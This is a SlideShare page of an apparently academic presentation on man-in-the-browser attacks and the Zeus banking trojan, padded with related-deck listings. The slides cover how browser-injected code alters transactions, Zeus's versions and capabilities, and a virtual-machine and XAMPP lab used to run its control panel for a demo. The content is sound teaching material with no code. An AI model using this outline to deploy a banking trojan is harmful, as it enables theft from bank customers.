SlideShare uma empresa Scribd logo

Man In The Browser

Save Manos
Save Manos
Tecnologia
1 de 16
Baixar para ler offline
Man-In-The-Browser Aras Tarhan Manos Dimogerontakis Mário Almeida Umit Buyuksahin
OUTLINE ● Man-in-the-Browser Attack ● Method of Attack ● Banking Trojans ● Zeus ● Zeus Installation ● Zeus Configuration Files ● DEMO
Man-in-the-Browser Attack ● Online phishers steal money from online customers ● Online customers become target with more advanced methods ● One of the latest and most dangerous is Man-in-the- Browser. ● The malicious code modifies actions performed by the computer users. ● Then, steals confidential information ● These attacks can not be detected by the user
Method of Attack ● The trojan installs an extension into the browser configuration ● Whenever a page is loaded, the URL of the page is searched by the extension against a list of known sites targeted for attack. ● When the handler detects a page-load for a specific pattern in its targeted list. ● When the submit button is pressed, the extension extracts all data from all form fields.
Method of Attack (2) ● The browser sends the form including the modified values to the server. ● The server receives the modified values in the form as normal request. ● The server performs the transaction and generates a receipt. ● The browser receives the receipt for the modified transaction and displays the modified receipt with the original details.
Banking Trojans A number of Trojan families are used to conduct MITB attacks. Some MITB Trojans are so advanced that they have streamlined the process for committing fraud, programmed with functionality to fully automate the process from infection to cash out. Some known banking trojans: ● Zeus ● Sinowal (Torpig) ● SpyEye ● Carberp ● Feodo ● Tatanga ● ...
ZEUS ● aim is to steal credentials of the victim ● steals banking information by using Key Stroke Logging and form grabbing methods ● first appearance 2007, become widespread 2009 ( about 3.6 million in US ) ● targets only Microsoft Windows OS ● used version: 2.0.8.9
Evolution of ZEUS ● Version 2.0.0.0, 01.04.2010 ○ full compatible with previous versions ○ the installation process in the system was re-written to send reports to the Control panel ○ valuable work with x32 applications in Windows x64 ○ the name of the botnet is limited to 20 characters and can contain any international characters ○ complete (as with wininet.dll) to work with nspr4.dll, but without HTTP-fakes ○ the configuration file is read in UTF-8 encoding
Evolution of ZEUS ● Version 2.0.1.0, 28.04.2010 ○ modified to bind to the user/OS ○ minor improvements to HTTP-injects ● Version 2.0.2.0, 10.05.2010 ○ forced change of Mozilla Firefox security settings for normal HTTP-injects ● Version 2.0.3.0, 19.05.2010 ○ in the configuration file, ■ added the option "StaticConfig.disable_tcpserver" ■ added the option "StaticConfig.remove_certs" ○ in control panel, fixed a bug in the module "Botnet-> Bots"
Evolution of ZEUS ● Version 2.0.5.0, 08.06.2010 ○ fixed minor bugs in HTTP-grabber ● Version 2.0.6.0, 22.06.2010 ○ fixed an error resuting in disabling HTTP-injects ● Version 2.0.8.0, 17.08.2010 ○ to the parameters HTTP-injects was added a new option "I" (compare URL insensitive) and "C" (comparison of context insensitive) ● Version 2.1.0.0, 20.03.2011 ○ RDP + VNC BACKCONNECT added to connect remotely to the victim
Zeus - Capabilities ● gets OS info ● does other things done by botnet scripts (like reboot, shutdown, log off and kill OS) ● takes screenshot ● sends a script to be executed ● searches files ● all orders and states of them can be viewed on a control panel in the server
Used Environments ● Virtual Machine ○ to add a significant layer of security and safety ○ both Server and Client to be hacked are installed on distinct Virtual Machines ○ used program: VirtualBox 4.1.6 for Windows hosts, Oracle ○ each of them has two network adaptors, Host-only to communicate between them and NAT for outside internet access ● Operating System ○ used program: Windows XP Service Pack 3, Microsoft ○ since Zeus we get is able to be builded on Windows
Used Environments ● Server and Database ○ to manage bots inside victims ○ to receive the information from bots running on infected clients ○ to store the targeted data about the victim ○ used program: XAMPP 1.7.7 including ■ Apache 2.2.21 ■ MySQL 5.5.16 ■ PHP 5.3.8 ■ phpMyAdmin 3.4.5
Zeus Installation
Demo
Man In The Browser

Recomendados

How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksImperva
 
Man-In-The-Browser attacks
Man-In-The-Browser attacksMan-In-The-Browser attacks
Man-In-The-Browser attacksMário Almeida
 
Man in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsMan in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsDaveEdwards12
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserSource Conference
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserguestb1956e
 
News Bytes
News BytesNews Bytes
News BytesMegha Sahu
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 

Recomendados

How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksImperva
 
Man-In-The-Browser attacks
Man-In-The-Browser attacksMan-In-The-Browser attacks
Man-In-The-Browser attacksMário Almeida
 
Man in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsMan in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsDaveEdwards12
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserSource Conference
 
CSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserCSI2008 Gunter Ollmann Man-in-the-browser
CSI2008 Gunter Ollmann Man-in-the-browserguestb1956e
 
News Bytes
News BytesNews Bytes
News BytesMegha Sahu
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!Roberto Martelloni
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowIBM Security
 
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Quick Heal Technologies Ltd.
 
Wannacry & Petya ransomware
Wannacry & Petya ransomwareWannacry & Petya ransomware
Wannacry & Petya ransomwareRaghavendra P.V
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaSecurity Bootcamp
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
Crimeware Fingerprinting Final
Crimeware Fingerprinting FinalCrimeware Fingerprinting Final
Crimeware Fingerprinting Finaljponnoly
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile AttackIRJET Journal
 
paper review about botnet
paper review about botnetpaper review about botnet
paper review about botnetJhang Raymond
 
Ransomware attacks 2017
Ransomware attacks 2017Ransomware attacks 2017
Ransomware attacks 2017Thesis Scientist Private Limited
 
A Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits AttackA Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits AttackCSCJournals
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threatsMartin Holovský
 
Ransomware Attack
Ransomware AttackRansomware Attack
Ransomware Attackdoiss delhi
 
An introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for DummiesAn introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for DummiesElsa Cariello
 
Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security TestingMarco Morana
 
Industry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacksIndustry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attackskevinmass30
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptYash Diwakar
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
A Survey of Botnet Detection Techniques
A Survey of Botnet Detection TechniquesA Survey of Botnet Detection Techniques
A Survey of Botnet Detection Techniquesijsrd.com
 
Secure client
Secure clientSecure client
Secure clientHai Nguyen
 
The ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devicesThe ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devicesMender.io
 

Mais conteúdo relacionado

Mais procurados

ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowIBM Security
 
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Quick Heal Technologies Ltd.
 
Wannacry & Petya ransomware
Wannacry & Petya ransomwareWannacry & Petya ransomware
Wannacry & Petya ransomwareRaghavendra P.V
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaSecurity Bootcamp
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITYyashwanthlavu
 
Crimeware Fingerprinting Final
Crimeware Fingerprinting FinalCrimeware Fingerprinting Final
Crimeware Fingerprinting Finaljponnoly
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile AttackIRJET Journal
 
paper review about botnet
paper review about botnetpaper review about botnet
paper review about botnetJhang Raymond
 
A Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits AttackA Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits AttackCSCJournals
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threatsMartin Holovský
 
Ransomware Attack
Ransomware AttackRansomware Attack
Ransomware Attackdoiss delhi
 
An introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for DummiesAn introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for DummiesElsa Cariello
 
Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security TestingMarco Morana
 
Industry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacksIndustry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attackskevinmass30
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptYash Diwakar
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
A Survey of Botnet Detection Techniques
A Survey of Botnet Detection TechniquesA Survey of Botnet Detection Techniques
A Survey of Botnet Detection Techniquesijsrd.com
 

Mais procurados (20)

WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...Centralized Patch Management - Proven Security Approach for Ransomware Protec...
Centralized Patch Management - Proven Security Approach for Ransomware Protec...
 
Wannacry & Petya ransomware
Wannacry & Petya ransomwareWannacry & Petya ransomware
Wannacry & Petya ransomware
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ Vikjava
 
WEB APPLICATION SECURITY
WEB APPLICATION SECURITYWEB APPLICATION SECURITY
WEB APPLICATION SECURITY
 
Crimeware Fingerprinting Final
Crimeware Fingerprinting FinalCrimeware Fingerprinting Final
Crimeware Fingerprinting Final
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
 
paper review about botnet
paper review about botnetpaper review about botnet
paper review about botnet
 
Ransomware attacks 2017
Ransomware attacks 2017Ransomware attacks 2017
Ransomware attacks 2017
 
A Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits AttackA Mitigation Technique For Internet Security Threat of Toolkits Attack
A Mitigation Technique For Internet Security Threat of Toolkits Attack
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threats
 
Ransomware Attack
Ransomware AttackRansomware Attack
Ransomware Attack
 
An introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for DummiesAn introduction to Unified Threat Management (UTM), for Dummies
An introduction to Unified Threat Management (UTM), for Dummies
 
Web Application Security Testing
Web Application Security TestingWeb Application Security Testing
Web Application Security Testing
 
Industry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacksIndustry reactions to wanna cry ransomware attacks
Industry reactions to wanna cry ransomware attacks
 
Ransomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCryptRansomware: WanaCry, WanCrypt
Ransomware: WanaCry, WanCrypt
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
A Survey of Botnet Detection Techniques
A Survey of Botnet Detection TechniquesA Survey of Botnet Detection Techniques
A Survey of Botnet Detection Techniques
 

Semelhante a Man In The Browser

The ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devicesThe ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devicesMender.io
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Mender.io
 
Cloud Security with LibVMI
Cloud Security with LibVMICloud Security with LibVMI
Cloud Security with LibVMITamas K Lengyel
 
Windows 7 professional Vs Windows 7 enterprise
Windows 7 professional Vs Windows 7 enterpriseWindows 7 professional Vs Windows 7 enterprise
Windows 7 professional Vs Windows 7 enterprise247infotech
 
SCCM 2007 Introduction - PICC 2012
SCCM 2007 Introduction - PICC 2012SCCM 2007 Introduction - PICC 2012
SCCM 2007 Introduction - PICC 2012capriguy84
 
Chromium os architecture report
Chromium os architecture reportChromium os architecture report
Chromium os architecture reportAmr Abd El Latief
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Mender.io
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing BasicsNSConclave
 
Mender: The open-source software update solution
Mender: The open-source software update solutionMender: The open-source software update solution
Mender: The open-source software update solutionMender.io
 
Lesson 2 - Understanding Operating System Configurations
Lesson 2 - Understanding Operating System ConfigurationsLesson 2 - Understanding Operating System Configurations
Lesson 2 - Understanding Operating System ConfigurationsGene Carboni
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docxeugeniadean34240
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2ShapeBlue
 
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...Integrate IoT cloud analytics and over the-air (ota) updates with google and ...
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...Mender.io
 
Linux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardeningLinux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardeningMender.io
 

Semelhante a Man In The Browser (20)

Secure client
Secure clientSecure client
Secure client
 
The ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devicesThe ultimate guide to software updates on embedded linux devices
The ultimate guide to software updates on embedded linux devices
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
 
Cloud Security with LibVMI
Cloud Security with LibVMICloud Security with LibVMI
Cloud Security with LibVMI
 
Windows 7 professional Vs Windows 7 enterprise
Windows 7 professional Vs Windows 7 enterpriseWindows 7 professional Vs Windows 7 enterprise
Windows 7 professional Vs Windows 7 enterprise
 
Introduction to chrome os
Introduction to chrome osIntroduction to chrome os
Introduction to chrome os
 
SCCM 2007 Introduction - PICC 2012
SCCM 2007 Introduction - PICC 2012SCCM 2007 Introduction - PICC 2012
SCCM 2007 Introduction - PICC 2012
 
Chromium os architecture report
Chromium os architecture reportChromium os architecture report
Chromium os architecture report
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing Basics
 
SP1_Battlecard
SP1_BattlecardSP1_Battlecard
SP1_Battlecard
 
Mender: The open-source software update solution
Mender: The open-source software update solutionMender: The open-source software update solution
Mender: The open-source software update solution
 
Lesson 2 - Understanding Operating System Configurations
Lesson 2 - Understanding Operating System ConfigurationsLesson 2 - Understanding Operating System Configurations
Lesson 2 - Understanding Operating System Configurations
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
Counterparty
CounterpartyCounterparty
Counterparty
 
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...Integrate IoT cloud analytics and over the-air (ota) updates with google and ...
Integrate IoT cloud analytics and over the-air (ota) updates with google and ...
 
Vm final
Vm finalVm final
Vm final
 
Linux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardeningLinux IoT Botnet Wars and the lack of basic security hardening
Linux IoT Botnet Wars and the lack of basic security hardening
 

Mais de Save Manos

Software Defined Networking for Community Network Testbeds
Software Defined Networking for Community Network TestbedsSoftware Defined Networking for Community Network Testbeds
Software Defined Networking for Community Network TestbedsSave Manos
 
Lock Service with Paxos in Erlang
Lock Service with Paxos in ErlangLock Service with Paxos in Erlang
Lock Service with Paxos in ErlangSave Manos
 
FOSS Licenses: A first attempt
FOSS Licenses: A first attemptFOSS Licenses: A first attempt
FOSS Licenses: A first attemptSave Manos
 
Ciel universal distributed execution engine
Ciel universal distributed execution engine Ciel universal distributed execution engine
Ciel universal distributed execution engine Save Manos
 
A boring presentation about social mobile communication patterns and opportun...
A boring presentation about social mobile communication patterns and opportun...A boring presentation about social mobile communication patterns and opportun...
A boring presentation about social mobile communication patterns and opportun...Save Manos
 
P2P-Tuple: Towards a Robust Volunteer Computing Platform
P2P-Tuple: Towards a Robust Volunteer Computing Platform P2P-Tuple: Towards a Robust Volunteer Computing Platform
P2P-Tuple: Towards a Robust Volunteer Computing Platform Save Manos
 
A survey on modifications for unstructured P2P in WMNs .
A survey on modifications for unstructured P2P in WMNs . A survey on modifications for unstructured P2P in WMNs .
A survey on modifications for unstructured P2P in WMNs . Save Manos
 
Intelligent Placement of Datacenter for Internet Services
Intelligent Placement of Datacenter for Internet Services Intelligent Placement of Datacenter for Internet Services
Intelligent Placement of Datacenter for Internet Services Save Manos
 
Network as a Service
Network as a ServiceNetwork as a Service
Network as a ServiceSave Manos
 
RESTful Web Services
RESTful Web ServicesRESTful Web Services
RESTful Web ServicesSave Manos
 
Distributed systems
Distributed systemsDistributed systems
Distributed systemsSave Manos
 

Mais de Save Manos (14)

Software Defined Networking for Community Network Testbeds
Software Defined Networking for Community Network TestbedsSoftware Defined Networking for Community Network Testbeds
Software Defined Networking for Community Network Testbeds
 
Lock Service with Paxos in Erlang
Lock Service with Paxos in ErlangLock Service with Paxos in Erlang
Lock Service with Paxos in Erlang
 
NaaS
NaaSNaaS
NaaS
 
FOSS Licenses: A first attempt
FOSS Licenses: A first attemptFOSS Licenses: A first attempt
FOSS Licenses: A first attempt
 
Ciel universal distributed execution engine
Ciel universal distributed execution engine Ciel universal distributed execution engine
Ciel universal distributed execution engine
 
A boring presentation about social mobile communication patterns and opportun...
A boring presentation about social mobile communication patterns and opportun...A boring presentation about social mobile communication patterns and opportun...
A boring presentation about social mobile communication patterns and opportun...
 
Apache Mahout
Apache MahoutApache Mahout
Apache Mahout
 
P2P-Tuple: Towards a Robust Volunteer Computing Platform
P2P-Tuple: Towards a Robust Volunteer Computing Platform P2P-Tuple: Towards a Robust Volunteer Computing Platform
P2P-Tuple: Towards a Robust Volunteer Computing Platform
 
A survey on modifications for unstructured P2P in WMNs .
A survey on modifications for unstructured P2P in WMNs . A survey on modifications for unstructured P2P in WMNs .
A survey on modifications for unstructured P2P in WMNs .
 
Intelligent Placement of Datacenter for Internet Services
Intelligent Placement of Datacenter for Internet Services Intelligent Placement of Datacenter for Internet Services
Intelligent Placement of Datacenter for Internet Services
 
Network as a Service
Network as a ServiceNetwork as a Service
Network as a Service
 
Openflow
OpenflowOpenflow
Openflow
 
RESTful Web Services
RESTful Web ServicesRESTful Web Services
RESTful Web Services
 
Distributed systems
Distributed systemsDistributed systems
Distributed systems
 

Último

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 

Último (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
